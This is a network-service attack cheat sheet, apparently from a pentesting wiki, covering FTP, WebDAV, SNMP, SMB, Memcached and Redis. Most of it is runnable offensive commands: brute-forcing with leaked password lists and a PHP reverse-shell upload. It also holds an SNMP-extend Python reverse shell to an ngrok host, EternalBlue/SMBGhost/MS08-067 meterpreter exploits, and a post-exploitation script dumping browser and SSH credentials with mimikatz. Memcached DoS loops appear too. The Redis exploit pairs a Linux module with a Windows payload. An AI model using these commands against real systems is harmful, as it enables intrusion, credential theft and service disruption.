Network Configuration
Check List
Cheat Sheet
FTP
Methodology
Run the following command on $TARGET
If $TARGET has FTP protocol, do the next command to login with Anonymous
and using the next command to brute force the login page, will the username or password be found or not?
and using the next command, can we login through the browser or not?
and if we enter, enter the commands related to FTP and exploit it using Hydra and Metasploit commands
nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITEnmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITEnmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITEftp://anonymous:anonymous@$TARGETsearchsploit $PRODUCT -s $VERSION -wMisconfiguration & Vulnerabilities
nuclei -tags ftp -u $TARGET:21wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21ftpopen $TARGET 21> anonymous> anonymouspassiveget file.txthydra -V \
-L /usr/share/seclists/Usernames/sap-default-usernames.txt \
-P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21msfconsole -qx "
use auxiliary/scanner/ftp/ftp_version;
set RHOSTS $WEBSITE;
run;
exit"msfconsole -qx "
use auxiliary/scanner/ftp/anonymous;
set RHOSTS $WEBSITE;
run;
exit"msfconsole -qx "
use auxiliary/scanner/ftp/ftp_login;
set RHOSTS $WEBSITE;
set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
run;
exit"WebDAV
Methodology
Run on $TARGET using the WebDAV command
And if it was open, the next command is used to find vulnerabilities related to WebDAV service using Metasploit.
Using the Hydra tool, we do Burte Force on this service to get the list of usernames and passwords
After the Burte Force command, we check if we can upload a file using the next command. If we could, we will upload the PHP file that contains RCE to the service using the command
And we can do the same thing using the PUT method, whether we can use this method to upload a file on this service or not.
nmap -p 80,443 \
-sS -sV --mtu 5000 \
--script http-methods,http-webdav-scan $WEBSITEmsfconsole -qx "
use auxiliary/scanner/http/webdav_scanner;
set PATH /webdav;
set RHOSTS $WEBSITE;
exit"hydra -V \
-L /usr/share/seclists/Usernames/sap-default-usernames.txt \
-P /usr/share/seclists/Passwords/darkweb2017-top10000.txt \
$TARGET http-get /webdav/davtest -url $WEBSITEdavtest -url $WEBSITE \
-uploadfile /usr/share/webshells/php/php-reverse-shell.php \
-uploadloc shell.phpnc -lvnp 1234cadaver $WEBSITE/webdavput /usr/share/webshells/php/php-reverse-shell.phpnc -lvnp 1234SNMP
Methodology
Run $TARTGET using the command related to SNMP discover
If it was open, check the vulnerabilities of the service using the command of the nuclei tool
Using the next command, get information from the target service such as host name and OID information, list of interfaces, configured IP addresses, hardware configuration, and sometimes more sensitive information depending on the implementation
Using the next command, find a list of common community strings (for example, public, private, manager, ...) and extract information from them using the snmpwalk command.
We use the snmpset command to write and change an OID on the SNMP service
If the service was an old version, we write a string value on the service using the command related to SNMPv1
If the service was an old version, use the SNMPv1 command to write a string value on the service, but if it was not using the old version, run the SNMPv2 command on the service.
Then open a port using the Ngrok command and execute the RCE injection command on the target and you can exploit it using Metasploit
nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITEnmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITENuclei
nuclei -tags snmp -u $TARGET:161snmpwalk -v1 -c public $TARGETonesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGETsnmpset -v1 -c private $TARGET OID s "unk9vvn"snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"ngrok http 4444 >/dev/null 2>&1 &NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')snmpset -m +NET-SNMP-EXTEND-MIB \
-v 2c \
-c SuP3RPrivCom90 $TARGET 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjectsmsfconsole -qx "
use auxiliary/scanner/snmp/snmp_enum;
set RHOSTS $WEBSITE;
run;
exit"msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enum;
set RHOSTS $WEBSITE;
set COMMUNITY private;
run;
exit"msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enumusers;
set RHOSTS $WEBSITE;
run;
exit"msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enumshares;
set RHOSTS $WEBSITE;
run;
exit"SMB
Methodology
If it was open, we check service vulnerabilities using Nmap with special switches for SMB
The next step is to use Brute Force commands on the target protocol to identify the protocol, get the username and password list, identify the domains and groups in the service, identify active services on this protocol, and identify the running processes.
Enter the service without a password using the commands related to the smbclient tool and find the list of subscriptions and a list of information.
The next step is to log in using the rpcclient command with an empty username so that we can connect to RPC with an empty session to scan/count users, groups, sessions and settings. If the server allows it, it exposes user information and subscriptions.
We can do this process and exploit using Metasploit commands
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITEnmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITEnmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-brute $WEBSITEnmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-users,smb-enum-shares $WEBSITEnmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-domains,smb-enum-groups $WEBSITEnmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-services,smb-enum-processes $WEBSITENuclei
nuclei -tags smb -u $TARGET:445netexec smb $TARGETenum4linux -a $TARGETnbtscan -r $TARGET/24smbclient -N -L //$TARGETrpcclient -U "" $TARGETmsfconsole -qx "
use auxiliary/scanner/smb/smb_version;
set RHOSTS $TARGET;
run;
exit"msfconsole -qx "
use auxiliary/scanner/smb/smb_enumusers;
set RHOSTS $TARGET;
run;
exit"msfconsole -qx "
use auxiliary/scanner/smb/smb_enumshares;
set RHOSTS $TARGET;
run;
exit"msfconsole -qx "
use auxiliary/scanner/smb/impacket/secretsdump;
set RHOSTS $TARGET;
run;
exit"msfconsole -qx "
use auxiliary/scanner/smb/smb_login;
set RHOSTS $TARGET;
set SMBUser Administrator;
set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;
run;
exit"msfconsole -qx "
use auxiliary/scanner/smb/smb_ms17_010;
set RHOSTS $TARGET;
run;
exit"ngrok http 4444 >/dev/null 2>&1 &NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOFmsfconsole -qx "
use exploit/windows/smb/ms17_010_eternalblue;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"msfconsole -qx "
use exploit/windows/smb/smb_doublepulsar_rce;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"msfconsole -qx "
use exploit/windows/smb/cve_2020_0796_smbghost;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"msfconsole -qx "
use exploit/windows/smb/ms08_067_netapi;
set PAYLOAD windows/meterpreter/reverse_hop_http;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"Memcached
Methodology
Use the Nmap command to identify and check the existence of the protocol on the target
If the service on the target is active, use the Nuclei command to identify the vulnerability on the protocol
Using the command related to Netcat, step by step, save the protocol version, status, items, name of identification key and list of lists.
The next step is to test the vulnerability of DOS and DDoS the service to identify the vulnerability using commands
nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITEnuclei -tags memcached -u $TARGET:11211echo "version" | nc -vn -w 1 $TARGET 11211echo "stats" | nc -vn -w 1 $TARGET 11211echo "stats slabs" | nc -vn -w 1 $TARGET 11211echo "stats items" | nc -vn -w 1 $TARGET 11211echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211echo "get $ITEM" | nc -vn -w 1 $TARGET 11211for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; doneecho -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211memcstat --servers=$TARGETmemcdump --servers=$TARGETmemccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3msfconsole -qx "use auxiliary/gather/memcached_extractor;set RHOSTS $TARGET;run;exit"msfconsole -qx "use auxiliary/dos/misc/memcached;set RHOSTS $TARGET;run;exit"Redis
Methodology
Identify the presence of the service on the target server by using the first Redis command in the cheat sheet with the Nmap tool
If the service is open on the target server, use the next command to check access in unauthenticated mode
In the next command, we use Hydra on the Brute Force service to extract a list of password lists, and with the next command, we use the Nuclei tool to check the Misconfiguration Vulnerability to the service.
nmap -p 6379 -sS -sV --mtu 5000 --script redis-info $TARGETredis-cli -h $TARGET -p 6379hydra -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt \
-s 6379 $TARGET redisnuclei -tags redis -u $TARGET:6379msfconsole -qx "use auxiliary/scanner/redis/redis_server;
set RHOSTS $TARGET;
run;
exit"msfconsole -qx "use auxiliary/gather/redis_extractor;
set RHOSTS $TARGET;
run;
exit"msfconsole -qx "
use auxiliary/scanner/redis/redis_login;
set RHOSTS $TARGET;
set ANONYMOUS_LOGIN true;
set BLANK_PASSWORDS true;
set STOP_ON_SUCCESS true;
set THREADS 10;
run -j"Exploitation
msfconsole -qx "
use exploit/linux/redis/redis_replication_cmd_exec;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"Last updated